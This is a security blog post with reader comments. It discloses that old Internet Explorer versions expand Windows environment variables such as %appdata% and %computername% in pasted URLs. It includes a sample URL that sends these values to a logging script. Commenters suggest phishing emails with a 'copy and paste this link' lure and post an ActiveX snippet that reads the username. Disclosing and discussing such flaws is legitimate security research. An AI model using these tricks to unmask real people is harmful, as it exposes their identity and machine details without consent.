Cenzic 232 Patent
Paid Advertising
web application security lab

De-cloaking in IE7.0 Via Windows Variables

Update: Tyler Reguly told me that you actually can get this working in IE8.0 but it needs to be part of a path. So I updated the example below so that it works in both.

One of the things Josh and I talked about during our preso was a way to get people to disclose their usernames and their machine names using a simple URL. Well, it turns out that in IE7.0 if you cut and paste things with a %…% in them it translates to a OS variable. So if you include something like %computername% or %appdata% or the like you’ll end up with machine names and full paths to the user’s home directory. That can be super helpful for de-cloaking. Please note this only works in Internet Explorer. Here’s an example:

http://ha.ckers.org/log.cgi/rAnd0mcr4p%aPpdAta%2hide%coMpuTeRnaME%th3v4rz

If you cut and paste that it will be translated on the fly before it is sent. So how you’d use this is either just like you see above - a URL that must be cut and pasted to be used or something like a broken link that is clearly easily re-constructed just by changing one letter or removing a space or something. I never did find a way to automatically get this to fire. I tried in CSS, images, iframes, frames, word docs, PDFs, and on and on. If someone figures out a way to make it automatically fire without user interaction that would make this a lot more useful. Either way, it seemed worthy of a post.

15 Responses to “De-cloaking in IE7.0 Via Windows Variables”

  1. ChosenOne Says:

    wow, nice find.

  2. rvdh Says:

    Interesting, I could get it to work here, but that might be due to my settings or emulation mode.

    Maybe you can try to bind a label through the FOR attribute?

    as in: http://rvdh.ath.cx/?i=310

    Maybe it gives some more control.

  3. Angel one Says:

    I don’t actually have a machine running IE7, so I can’t test this, but would just emebedding it in an img tag work?

  4. Angel one Says:

    Apparently this works in IE6 as well (which means I can test it because I do have one windows machine with IE6). img tags and embedding it in iframes don’t work.

  5. Wornstrom Says:

    I think this is specifically part of the “paste into address bar” logic, intended for copying things into Explorer in file browser mode. I used that often, never thought to try it in IE.

  6. Robert A. Says:

    Silly Microsoft. Good find.

  7. anon Says:

    var shell = new ActiveXObject(”WScript.Shell”);
    alert(shell.ExpandEnvironmentStrings(”%USERNAME%”));

    This works, you just have to get someone to trust you enough to run the ActiveXObject or stupidly turn down their security settings.

    I also tried it with XSS / AJAX and invisible redirecting (with the header( “Location:” ) command in PHP) to no avail. It’s the copy/paste magic, like you’ve said, that allows this to happen (mainly). Too bad.

  8. anon Says:

    the above script is in Javascript, btw (comments with tags are stripped, instead of entified, not a bad idea, haha).

  9. Vinícius K-Max Says:

    Yes, working in IE6 too. Veeeeery old bug, btw.

  10. gnarlysec Says:

    This sounds perfect for doing detailed reconnaissance on a specific person. All you would have to do is send them an email with a broken link in it. Under the link, say “Link not working? copy and paste this into your address bar” and boom! they’ll do it and the server logs the expanded environment variables.

  11. Nephi Johnson Says:

    Would be perfect for helping discover additional information about a specific person. Just have to send them an email with a broken link with “Link not working? Copy and paste this into your address bar” below it.

  12. Mr.N Says:

    Nice find. Probably the easiest way to get someone to trigger it would be to post it on some social network site or forum as an unlinked url (one that didn’t automatically convert urls to links). Does it work if you encode it, or does the operating system not know what to do with that? Also of note, javascript in IE supports Object.execCommand(”copy”) and Object.execCommand(”paste”), does the translation happen in any circumstance using those calls? I don’t think you can call them against the address bar, but you might give it a shot (I don’t have time atm or I’d do it myself).

  13. Paul Says:

    This is interesting. Silly Microsoft! The following piece of javascript will prompt with a Security alert about enabling an ActiveX control:

    window.location.href=’http://google.com/%USERNAME%’;

  14. Watari Says:

    Gee whiz. It works in IE8 too. You switch to “work offline” to keep from posting.

  15. pushkar bhatkoti Says:

    Yupppp, it works perfectly. Shame on Microsoft.
    I’m firefox lover and heyyyy no scripting

    -push bhatkoti